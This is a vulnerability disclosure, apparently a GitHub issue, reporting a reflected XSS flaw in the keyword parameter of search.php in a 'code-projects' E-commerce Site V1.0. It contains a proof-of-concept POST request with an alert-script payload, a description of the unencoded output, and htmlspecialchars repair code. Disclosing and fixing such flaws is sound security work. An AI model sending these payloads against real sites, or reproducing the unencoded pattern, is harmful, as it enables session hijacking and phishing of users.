
code-projects E-commerce Site Project V1.0/search.php Reflected XSS Attack #4

@BalanceLee

Description

code-projects E-commerce Site Project V1.0/search.php Reflected XSS Attack

NAME OF AFFECTED PRODUCT(S)

  • E-commerce Site

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

Submitter

  • balancelee

Vulnerable File

  • /search.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • Reflected XSS

Root Cause

  • The $_POST['keyword'] value is directly embedded in the HTML without applying any XSS protections such as htmlspecialchars().

Impact

  • An attacker can execute arbitrary scripts, leading to:

    • Theft of user cookies (session hijacking)
    • Forged login or transactions
    • Phishing attacks by modifying page content
    • Unauthorized access to localStorage, sessionStorage, etc.

DESCRIPTION

  • The vulnerability occurs in the search.php page, where user input from the keyword parameter is embedded directly into the HTML output without proper sanitization or encoding. This allows attackers to craft malicious JavaScript that executes in the victim’s browser, leading to cookie theft, session hijacking, phishing, and more.

Vulnerability details and POC

Vulnerability Name:

  • Reflected XSS

POC Example:

```http
POST /ecommerce/search.php HTTP/1.1
Host: localhost
Content-Length: 55
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="99", "Chromium";v="130"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/ecommerce/
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=va04tdv24l43kfvceb3v1844h3
Connection: keep-alive

keyword=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
```

The following is the vulnerability exploitation process and the screenshot of the result (the decoded `keyword` value submitted above):

```html
<script>alert('XSS')</script>
```

Suggested repair

  1. Perform HTML encoding on all user inputs:
     Example repair:

```php
echo '<h1 class="page-header">No results found for <i>'.htmlspecialchars($_POST['keyword'], ENT_QUOTES, 'UTF-8').'</i></h1>';
```

  2. Use WAF:
     Use a Web Application Firewall (WAF) to intercept typical XSS attacks.
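As an added illustration (not the project's own code), the vulnerable concatenation described under Root Cause beside the encoded version from repair step 1, runnable from the PHP CLI so the two outputs can be compared; the function names `e`, `render_vulnerable` and `render_fixed` are assumptions, not names from search.php:

```php
<?php
// Added example, not code from the E-commerce Site project. It contrasts the
// unencoded output pattern the report describes with the htmlspecialchars()
// repair, using the same payload as the POC (constructed test input).
declare(strict_types=1);

// Encode a value for an HTML text or attribute context.
// ENT_QUOTES encodes both ' and "; ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of returning an empty string (which would hide errors).
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern from the report: the raw keyword is concatenated into the
// markup, so markup inside the keyword is parsed as markup by the browser.
function render_vulnerable(string $keyword): string
{
    return '<h1 class="page-header">No results found for <i>' . $keyword . '</i></h1>';
}

// Hardened pattern: the user-controlled value is encoded at output time.
function render_fixed(string $keyword): string
{
    return '<h1 class="page-header">No results found for <i>' . e($keyword) . '</i></h1>';
}

// Constructed input: the decoded POC body. In a real request this would be
// $_POST['keyword']; on the CLI $_POST is empty, so fall back to the sample.
$sample  = "<script>alert('xss')</script>";
$keyword = $_POST['keyword'] ?? $sample;

echo 'vulnerable: ' . render_vulnerable($keyword) . PHP_EOL;
echo 'fixed:      ' . render_fixed($keyword) . PHP_EOL;

// Self-check: the encoded output must not contain a raw tag delimiter.
if (strpos(render_fixed($keyword), '<script') !== false) {
    fwrite(STDERR, "encoding failed\n");
    exit(1);
}
```

The "fixed" line prints the keyword as `&lt;script&gt;alert(&#039;xss&#039;)&lt;/script&gt;`, which the browser displays as literal text rather than executing.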
